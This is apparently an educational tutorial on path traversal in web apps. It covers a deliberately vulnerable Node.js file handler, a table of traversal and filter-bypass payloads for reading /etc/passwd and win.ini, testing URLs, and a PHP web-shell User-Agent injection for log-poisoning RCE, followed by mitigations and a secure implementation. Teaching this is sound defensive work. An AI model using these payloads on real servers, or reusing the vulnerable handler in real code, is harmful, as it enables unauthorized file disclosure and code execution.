Path Traversal Vulnerabilities
What is Path Traversal?
Path Traversal, also known as Directory Traversal, is a web security vulnerability that allows an attacker to read arbitrary files on the server by manipulating file paths in user input.
How Does It Work?
Many applications allow users to view or download files by specifying their names in a URL parameter, like so:
```http
GET /view?file=report.pdf
```
Internally, the application might be doing something like:
```javascript
const fs = require("fs");

const file = req.query.file;                 // attacker-controlled value from the URL
const filePath = "/var/www/files/" + file;   // concatenated with no validation or canonicalization
fs.readFile(filePath, (err, data) => {
  res.send(data);                            // whatever was read is returned to the client
});
```
If an attacker changes the value of `file` to something like `../../../etc/passwd`, they can traverse outside the intended directory:
```http
GET /view?file=../../../etc/passwd
```
What does ../ mean?
- `../` tells the file system to go one directory up.
- Chaining it like `../../../../` moves further up the directory tree.
Windows vs Linux
- Linux system files: `/etc/passwd`, `/var/log/auth.log`
- Windows: `C:\Windows\win.ini`, `C:\boot.ini`
Common Attack Payloads
Payload | Description |
---|---|
../../../../etc/passwd | Reads Linux password file |
..\..\..\windows\win.ini | Reads Windows config file |
%2e%2e/%2e%2e/%2e%2e/ | URL-encoded traversal |
....//....//....// | Bypass weak filters |
..%c0%af..%c0%afetc/passwd | Unicode-encoded bypass (Apache bug) |
How to Detect Path Traversal
Manual Testing
Check parameters like `file=`, `path=`, `page=`, `download=`, `doc=`.
Try payloads:
```http
/view?file=../../../../etc/passwd
/view?file=..%2f..%2f..%2fetc%2fpasswd
/view?path=....//....//....//.env
```
Automated Tools
- ffuf – fuzz file parameters
- dirsearch – find hidden paths
- feroxbuster – recursive content discovery
- LFI Suite – tool for LFI fuzzing
Advanced Attacks (Beyond Path Traversal)
Log Poisoning + LFI → RCE
This only turns into code execution when the server includes the fetched file as PHP rather than merely reading and returning it.
- Inject PHP code into logs (e.g., via the User-Agent header): `User-Agent: <?php system($_GET['cmd']); ?>`
- Access the log via LFI: `/view?file=../../../../var/log/apache2/access.log&cmd=whoami`
Read Application Source Code
```http
/view?file=../../../app/controllers/admin.js
```
Can reveal:
- Admin routes
- Secrets
- Token names
Mitigations
Mitigation | Description |
---|---|
Input Validation | Block `../`, `..\`, encoded traversal, etc. (a blocklist on its own is easily bypassed, as the `....//` payload above shows) |
Whitelisting | Only allow filenames from a known safe list |
Use path.resolve() | Canonicalize paths and verify against allowed dir |
Run App in Jail/Chroot | Restrict file access to a limited area |
Remove Sensitive Files | No .env , backup.zip , debug.log in prod |
Example: Secure Implementation
```javascript
const path = require("path");

// Canonical absolute path of the only directory we are willing to serve from.
const safeBase = path.resolve("/var/www/files");

// Reject non-string values (e.g. ?file=a&file=b arrives as an array and would make path.resolve throw).
if (typeof req.query.file !== "string") {
  return res.status(400).send("Bad request.");
}

// Resolve the user-supplied name against the base. An absolute input such as
// "/etc/passwd" makes path.resolve discard safeBase, so it fails the check below.
const requestedPath = path.resolve(safeBase, req.query.file);

// Require the result to sit below base + separator. A bare startsWith(safeBase)
// would also accept "/var/www/files2/..." because it shares the string prefix.
if (!requestedPath.startsWith(safeBase + path.sep)) {
  return res.status(403).send("Access denied.");
}

res.sendFile(requestedPath);
```
TL;DR
Type | Description | Risk |
---|---|---|
../../etc/passwd | Read sensitive system files | High |
.git/config | Expose Git repo & dev creds | Critical |
.env | Leak API keys and DB passwords | Critical |
Log Injection + LFI | Combine to achieve RCE | Critical |